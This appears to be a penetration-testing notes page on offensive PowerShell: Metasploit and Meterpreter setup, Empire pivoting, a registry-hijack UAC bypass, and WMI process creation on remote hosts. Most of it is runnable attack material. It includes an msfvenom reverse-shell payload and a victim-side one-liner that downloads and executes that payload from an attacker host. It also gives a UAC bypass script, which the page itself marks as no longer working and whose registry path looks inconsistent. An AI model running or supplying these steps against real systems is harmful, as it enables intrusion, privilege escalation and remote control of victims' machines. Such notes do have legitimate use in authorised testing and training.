Misc Powershell Playground

Powershell with Metasploit + psh payload + Meterpreter

Step 1: Multi Handler in Metasploit

On Kali:

# msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LHOST x.x.x.x
set LPORT 443
exploit -j

Step 2: Generate PS Script payload using Msfvenom

On Kali:

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=x.x.x.x LPORT=443 -f psh-reflection > payload.ps1

Step 3: Serve the payload

On Kali:

python -m SimpleHttpServer 80

Step 4: Download and Run on victim

powershell iex (New-Object Net.WebClient).DownloadString("http://x.x.x.x/payload.ps1")

Now the handler should get a reverse shell

Note that in Meterpreter, we can use load powershell to get us a powershell session / execute powershell command / import powershell script.

Empire Agent shell to Metasploit Meterpreter

Assume we now have a Active agent in Empire.

Step 1: Metasploit multi script

use multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_https
set SRVHOST <attacker_ip>
set LHOST <attacker_ip>
set target 2
exploit

Then a command will appear, as well as the payload location.

Step 2:

On Empire:

usemodule powershell/code_execution/invoke_metasploitpayload
set URL http://x.x.x.x:8080/xxxxxxxx
set Agent <agent ID>
execute

Now on Metasploit, a new session should spawn!

UAC Bypass

To view UAC settings on Powershell:

 Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA

To bypass UAC, at least you fulfill all of the following:

  1. Local Admin

  2. Current UAC setting is Default

In fact, it depends on the Integrity level of the program.

  • Medium integrity process cannot perform admin work without passing UAC

Some integrity process has built-in high integrity!

msconfig.exe

msconfig.exe is by default in High Integrity and you do not need to pass UAC. This is because it is set when compiled.

To check, we can use pestudio to inspect:

Note <autoElevate>true</autoElevate>

But this process cannot help us to bypass UAC. Instead use Computer Management!

compmgmtlauncher.exe (mmc.exe)

Launching compmgmtlauncher.exe, eventually you will see this pair:

  • Parent Process: mmc.exe

  • Process: compmgmt.msc

In fact the mmc.exe command line is:

"C:\Windows\system32\mmc.exe" "C:\Windows\system32\compmgmt.msc" /s

In the middle of the launching process, compmgmtlauncher.exe opens a Registry HKCU\Software\Classes\mscfile\shell\open\command, which can be modified by the current user! This can be leveraged to bypass UAC!

If you go to HKEY_CURRENT_USER\Software\Classes\, you will see there is no mscfile. Create according to the behavior:

HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command and configure the default value of command to be the program you want!

UAC_Bypass.ps1 (Not work anymore)

<#
  UAC Bypass
#>

echo "[+] Checking UAC status ..."

$ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
$SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop

if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
  "[!] UAC is set to 'Always Notify', cannot bypass UAC :("
} else {
  echo "[*] UAC Status OK and set to 'Default'!"
  
  $MscRegPath = "HKCU:\Software\Classes\mscfile\shell\open\shell"
  $ValName = "(Default)"
  $RegValue = "cmd.exe"
  
  New-Item -Path $MscRegPath -Force | Out-Null
  New-ItemProperty -Path $MscRegPath -Name $ValName -Value $RegValue | Out-Null
  
  $CompMgmtBypass = '"wmic process call create "cmd.exe /c start /min C:\windows\system32\CompMgmtLauncher.exe""'
  $a_cmd = "C:\windows\system32\cmd.exe"
  &$a_cmd = $CompMgmtBypass
  
  Start-Sleep -s 5
  
  # Cleanup registry modifications
  $MscRegCleanup = "HKCU:\Software\Classes\mscfile"
  Remove-Item -Path $MscRegCleanup -Force -Recurse -ErrorAction SilentlyContinue | Out-Null

WMI for Persistence

Get-WmiObject

Show all namespaces objects:

Get-WmiObject -Namespace "root/cimv2" -Class "__Namespace"

To be simple ...

Get-WmiObject -Namespace "root/cimv2" -Class "__Namespace" | Select-Object Name

To get all classes (Overwhelming!!!):

Get-WmiObject -Namespace "root/cimv2" -List
Get-WmiObject -Namespace "root/cimv2" -List | ? { $_.Name -Match "Win32_service" }

For example, we see a class name Win32_Service. Let's try:

Get-WmiObject -Class Win32_Service
Get-WmiObject -Class Win32_Service | ? { $_.State -Match "Running" }

Many times, we will query the Win32_Process class:

Get-WmiObject -Class Win32_Process -List
Get-WmiObject -List Win32_Process | Get-Member -MemberType Method

To create process:

$proc = Get-WmiObject -List Win32_Process
$proc.Create("cmd.exe")

Invoke-WmiMethod

Also there is another cmdlet to do the same:

Invoke-WmiMethod -Class Win32_Process -Method create -ArgumentList cmd.exe

We can also perform remote WMI jobs:

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList cmd.exe -ComputerName <ComputerName> -Credential <User>

PowerLurk

PreviousEmpireNextPassive Reconnaissance

Last updated